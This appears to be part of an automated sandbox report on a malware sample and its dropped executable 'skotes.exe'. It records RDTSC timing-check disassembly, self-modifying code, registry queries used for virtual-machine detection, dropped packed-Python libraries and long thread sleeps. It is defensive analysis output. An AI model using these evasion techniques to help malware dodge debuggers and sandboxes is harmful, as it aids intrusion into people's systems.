Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 7DB53B second address: 7DB57B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F8124CF45A5h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F8124CF459Bh 0x00000013 jmp 00007F8124CF45A4h 0x00000018 push eax 0x00000019 pop eax 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 7DB809 second address: 7DB82F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 pushad 0x00000007 jg 00007F8124DF87D7h 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007F8124DF87C6h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 7DB9B0 second address: 7DB9B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 7DB9B4 second address: 7DB9C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F8124DF87CCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 7DB9C2 second address: 7DB9D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a jmp 00007F8124CF459Ah 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 7DD337 second address: 7DD33C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 7DD33C second address: 65EACC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124CF459Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 4864B032h 0x00000010 push dword ptr [ebp+122D16F1h] 0x00000016 sub dword ptr [ebp+122D1FEAh], eax 0x0000001c call dword ptr [ebp+122D2066h] 0x00000022 pushad 0x00000023 jbe 00007F8124CF459Ch 0x00000029 mov dword ptr [ebp+122D1DCBh], ecx 0x0000002f xor eax, eax 0x00000031 jmp 00007F8124CF45A7h 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a jmp 00007F8124CF45A7h 0x0000003f mov dword ptr [ebp+122D2C99h], eax 0x00000045 mov dword ptr [ebp+122D203Ch], edi 0x0000004b mov esi, 0000003Ch 0x00000050 sub dword ptr [ebp+122D1DCBh], eax 0x00000056 add esi, dword ptr [esp+24h] 0x0000005a jmp 00007F8124CF45A1h 0x0000005f xor dword ptr [ebp+122D1DCBh], edi 0x00000065 lodsw 0x00000067 jmp 00007F8124CF459Eh 0x0000006c add eax, dword ptr [esp+24h] 0x00000070 add dword ptr [ebp+122D1DCBh], esi 0x00000076 mov ebx, dword ptr [esp+24h] 0x0000007a cmc 0x0000007b nop 0x0000007c push eax 0x0000007d push edx 0x0000007e jmp 00007F8124CF45A3h 0x00000083 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 7DD467 second address: 7DD47C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F8124DF87CCh 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 7DD525 second address: 7DD52B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 7DD52B second address: 7DD52F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 7DD52F second address: 7DD533 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 7DD533 second address: 7DD563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8124DF87D8h 0x0000000f pop edx 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 ja 00007F8124DF87C6h 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 7DD563 second address: 7DD5DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124CF459Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007F8124CF45A8h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 jmp 00007F8124CF45A6h 0x0000001a pop eax 0x0000001b or di, 9241h 0x00000020 push 00000003h 0x00000022 push edx 0x00000023 mov esi, ebx 0x00000025 pop ecx 0x00000026 push 00000000h 0x00000028 mov esi, 75E78B4Ch 0x0000002d push 00000003h 0x0000002f jmp 00007F8124CF459Eh 0x00000034 push FC868ED6h 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c jg 00007F8124CF4596h 0x00000042 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 7DD5DA second address: 7DD5DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 7DD66C second address: 7DD670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 7DD746 second address: 7DD74B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 7DD74B second address: 7DD751 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 7DD751 second address: 7DD76D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f ja 00007F8124DF87C6h 0x00000015 jc 00007F8124DF87C6h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 7CBBE2 second address: 7CBC32 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F8124CF45A4h 0x0000000e js 00007F8124CF4596h 0x00000014 popad 0x00000015 pop edx 0x00000016 pushad 0x00000017 pushad 0x00000018 jmp 00007F8124CF45A3h 0x0000001d jno 00007F8124CF4596h 0x00000023 popad 0x00000024 jnp 00007F8124CF4598h 0x0000002a pushad 0x0000002b pushad 0x0000002c popad 0x0000002d pushad 0x0000002e popad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 7FCFB0 second address: 7FCFD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8124DF87CEh 0x00000008 jmp 00007F8124DF87D0h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Special instruction interceptor: First address: 39EB1A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Special instruction interceptor: First address: 39EA25 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Special instruction interceptor: First address: 5D4444 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 65EB1A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 65EA25 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 894444 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe

Code function: 0_2_04F40D14 rdtsc

0_2_04F40D14

Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51562\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_RIPEMD160.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_MD4.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\_queue.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51562\mfcm90u.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Util\_strxor.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51562\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_poly1305.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51562\_win32sysloader.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51562\_tkinter.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_cfb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51562\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_aesni.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51562\mfcm90.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51562\win32ui.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51562\msvcr90.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_arc2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\libffi-7.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_Salsa20.pyd	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51562\mpc\mpc.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_blowfish.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51562\bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51562\mfc90u.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\cryptography\hazmat\bindings\_rust.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\libssl-1_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51562\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51562\win32api.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Util\_cpuid_c.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51562\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_ctr.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_MD2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\_pytransform.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51562\mfc90.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51562\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_chacha20.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51562\win32event.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_cast.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51562\pythoncom27.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_ARC4.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51562\mpc\41678903251236549780	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51562\win32trace.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\_cffi_backend.cp310-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\PublicKey\_ec_ws.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51562\win32process.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Math\_modexp.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_cbc.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51562\msvcm90.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\_asyncio.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_MD5.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_ofb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_aes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\charset_normalizer\md__mypyc.cp310-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_ocb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51562\msvcp90.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_keccak.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\_overlapped.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\charset_normalizer\md.cp310-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_des.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51562\python27.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_ecb.pyd	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5788	Thread sleep count: 38 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5788	Thread sleep time: -76038s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 644	Thread sleep time: -54027s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5256	Thread sleep count: 50 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5256	Thread sleep time: -100050s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6444	Thread sleep count: 114 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6444	Thread sleep time: -3420000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6508	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6508	Thread sleep time: -66033s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6536	Thread sleep count: 48 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6536	Thread sleep time: -96048s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1484	Thread sleep count: 45 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1484	Thread sleep time: -90045s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6052	Thread sleep time: -48024s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6444	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
